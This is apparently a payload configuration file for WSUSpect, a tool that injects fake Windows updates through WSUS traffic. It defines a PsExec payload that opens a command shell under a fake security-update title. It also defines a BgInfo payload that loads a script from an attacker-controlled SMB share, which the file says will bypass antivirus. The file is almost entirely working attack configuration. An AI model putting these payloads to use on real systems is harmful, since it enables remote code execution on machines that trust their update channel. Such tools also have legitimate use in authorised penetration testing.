# WSUSpect payload parameters 

[psexec]
payload = PsExec.exe
args = /accepteula -i 1 cmd
title = Super important security update MS015-ABC
description = Do bad things to your computer!

[bginfo]
payload = BgInfo.exe
args = \\attacker-ip\unauth_share\bginfo\script.bgi /nolicprompt /timer:0
title = BgInfo payload
description = Bypass AV that blocks PsExec